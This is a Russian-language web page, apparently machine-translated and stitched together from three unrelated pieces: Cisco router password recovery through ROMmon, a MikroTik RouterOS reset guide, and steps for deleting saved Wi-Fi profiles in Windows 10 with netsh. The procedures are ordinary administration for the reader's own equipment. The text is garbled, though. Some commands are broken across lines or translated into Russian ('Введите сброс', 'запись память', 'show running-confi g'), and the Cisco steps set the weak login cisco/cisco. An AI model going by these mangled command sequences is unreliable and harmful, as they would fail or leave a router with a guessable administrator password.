- Нажмите break на клавиатуре терминала в течение 1 минуты после включения, чтобы подключить маршрутизатор к ROMmon.
- Введите confreg 0x2142 в командной строке rommon 1> для загрузки с флэш-памяти.
- Введите reset в командной строке rommon 2>.
- Введите no после каждого вопроса настройки или нажмите Ctrl+C , чтобы пропустить все вопросы.
- Введите enable в приглашении Router>
- Введите configure memory или copy startup-config running-config , чтобы скопировать NVRAM в память.
- Введите show running-confi g
- Введите configure terminal
- Введите enable secret < введите пароль, который вы запомните, > , чтобы включить secret, чтобы изменить секрет.
- Введите команду no shutdown для каждого используемого вами интерфейса.
- Введите регистр конфигурации . Обычно это 0x2102.
- Нажмите Ctrl-z или end , чтобы выйти из режима настройки.
- Введите write memory или скопируйте running-config startup-config , чтобы зафиксировать изменения.
- Снимите компактную флэш-память с задней панели маршрутизатора.
- Включите маршрутизатор.
- Когда появится приглашение Rommon1>, введите команду confreg 0x2142
- Вставьте компактную флэш-память.
- Введите сброс .
- При появлении запроса на ввод исходной конфигурации введите нет и нажмите введите .
- В приглашении router> введите enable
- В приглашении Router# введите команду configure memory и нажмите Enter, чтобы скопировать начальную конфигурацию в текущую.
- Используйте команду config t , чтобы войти в режим глобальной конфигурации.
- Используйте эту команду, чтобы создать новое имя пользователя и пароль: маршрутизатор (config) #username cisco привилегия 15 пароль
cisco - Используйте эту команду для изменения оператора загрузки: config-register
0x2102 - Используйте эту команду для сохранения конфигурации: запись
память - Перезагрузите маршрутизатор, а затем используйте новое имя пользователя и пароль для входа в маршрутизатор.
Руководство:Сброс — MikroTik Wiki
Примечание. Пароль RouterOS можно сбросить только путем переустановки маршрутизатора или с помощью кнопки сброса (или отверстия для перемычки) в случае аппаратного обеспечения RouterBOARD. Для устройств X86 только полная переустановка удалит пароль вместе с другой конфигурацией. Для устройств RouterBOARD существует несколько методов, в зависимости от нашей модели.
Сброс с RouterOS
Если у вас все еще есть доступ к вашему маршрутизатору и вы хотите восстановить его конфигурацию по умолчанию, вы можете:
- ) запустите команду «/system reset-configuration» из интерфейса командной строки
- ) сделайте это из меню System -> Reset Configuration в графическом пользовательском интерфейсе.
С помощью кнопки сброса
УстройстваRouterBOARD оснащены кнопкой сброса, которая выполняет несколько функций:
- Загрузка резервного загрузчика RouterBOOT
Удерживайте эту кнопку перед подачей питания, отпустите через три секунды после подачи питания, чтобы загрузить резервный загрузчик. Это может быть необходимо, если устройство не работает из-за неудачного обновления RouterBOOT. Когда вы запустили устройство с резервным загрузчиком, вы можете либо установить RouterOS на принудительно загрузчик резервного копирования в настройках RouterBOARD, либо переустановить сбойный RouterBOOT из файла «.fwf» (всего 3 секунды )
- Сброс конфигурации RouterOS
Удерживайте эту кнопку, пока светодиодный индикатор не начнет мигать, отпустите кнопку, чтобы сбросить конфигурацию RouterOS по умолчанию. Чтобы подключить это устройство к беспроводной сети, управляемой CAPsMAN, удерживайте кнопку еще 5 секунд, светодиод загорится, отпустите сейчас, чтобы включить режим CAP
- Запуск RouterBOARD в режиме Netinstall
Или продолжайте удерживать кнопку кнопку еще на 5 секунд, пока светодиод не погаснет, затем отпустите ее, чтобы RouterBOARD начал поиск серверов Netinstall.Вы также можете просто удерживать кнопку нажатой, пока устройство не появится в программе Netinstall в Windows.
Примечание: Вы также можете выполнять предыдущие три функции без загрузки резервного загрузчика, просто нажмите кнопку сразу после подачи питания. Вам может понадобиться помощь другого человека, чтобы нажать кнопку и одновременно подключить блок питания
Как сбросить конфигурацию
1) отключить устройство от питания
2) нажать и удерживать кнопку сразу после подачи питания
Примечание: удерживайте кнопку до тех пор, пока светодиод не начнет мигать
3) отпустите кнопку, чтобы очистить конфигурацию.
Примечание: Если вы подождете, пока светодиод перестанет мигать, и только потом отпустите кнопку, вместо этого будет запущен режим Netinstall для переустановки RouterOS.
Сброс отверстия перемычки
Для некоторых устройств может потребоваться открытие корпуса, RB750/RB951/RB751 имеют отверстие для перемычки под одной из резиновых ножек корпуса.
Использование : Закройте перемычку металлической отверткой и загружайте плату, пока конфигурация не будет очищена.
Сброс перемычки для старых моделей
На изображении ниже показано расположение перемычки сброса на старых RouterBOARD, таких как RB133C:
Примечание: Не забудьте снять перемычку после сброса конфигурации, иначе она будет сбрасываться при каждой перезагрузке.
3 метода абсолютного удаления сохраненной сети Wi-Fi в Windows 10
Убедитесь, что вы подключились к сети Wi-Fi до удаления сети Wi-Fi , которую вы сохранили в Windows 10.Определенно, если вы являетесь пользователями, которые забыли пароль беспроводной сети, успокойтесь, вы можете найти и просмотреть пароль в свойствах беспроводной сети. Мы верим, что вы можете извлечь из этого пользу.
В этом тексте мы просто представляем 3 способа, которые помогут вам полностью удалить сохраненную сеть Wi-Fi в Windows 10.
Способ 1: удалить сохраненную сеть Wi-Fi в Windows 10 с помощью приложения «Настройки»
Шаг 1. Запустите приложение «Настройки» в Windows 10.
Шаг 2: В окне приложения «Настройки» нажмите Сеть и Интернет .
Шаг 3: Нажмите Wi-Fi в разделе «Сеть и Интернет», а затем выберите Управление известными сетями .
Шаг 4: Когда вы открываете Управление известными сетями, все сети Wi-Fi появляются в новом окне.
Шаг 5: В этом списке сетей Wi-Fi найдите сеть, которую вы хотите забыть, и нажмите кнопку «Забыть ».
Примечание. Если вы предпочитаете забыть или удалить другие сети, обязательно повторите вышеуказанные шаги.
Способ 2: удалить сохраненную сеть Wi-Fi в Windows 10 с помощью меню Wi-Fi
Шаг 1: Откройте меню Wi-Fi в правом нижнем углу экрана.
Шаг 2: Щелкните правой кнопкой мыши 3dlink , который хотите удалить, и нажмите кнопку Забыть . Наконец, сеть Wi-Fi будет полностью удалена из списка сетей.
Метод 3: очистить сохраненную сеть Wi-Fi в Windows 10 из командной строки
Шаг 1. Откройте командную строку от имени администратора в Windows 10.
Шаг 2. В окне командной строки введите следующую команду: netsh wlan show profiles .
Шаг 3: Затем нажмите , введите клавиатуру. В это время вы можете увидеть список сохраненных сетей Wi-Fi там.
Шаг 4: Выберите беспроводную сеть , которую вы предпочитаете удалить, например, если вы хотите удалить сеть ЧПУ, вы можете ввести следующую команду и ввести ее как: netsh wlan delete profile name=»CNC Network» .
Шаг 5: Наконец, появляется подсказка Профиль сети ЧПУ удален из интерфейса «Wi-Fi» .
Кроме того: если вы хотите удалить все сети Wi-Fi, сначала откройте окно командной строки и введите следующую команду: netsh wlan delete profile name=* i=* . Затем нажмите и введите , все сетевые профили мгновенно удалятся из интерфейса Wi-Fi.
.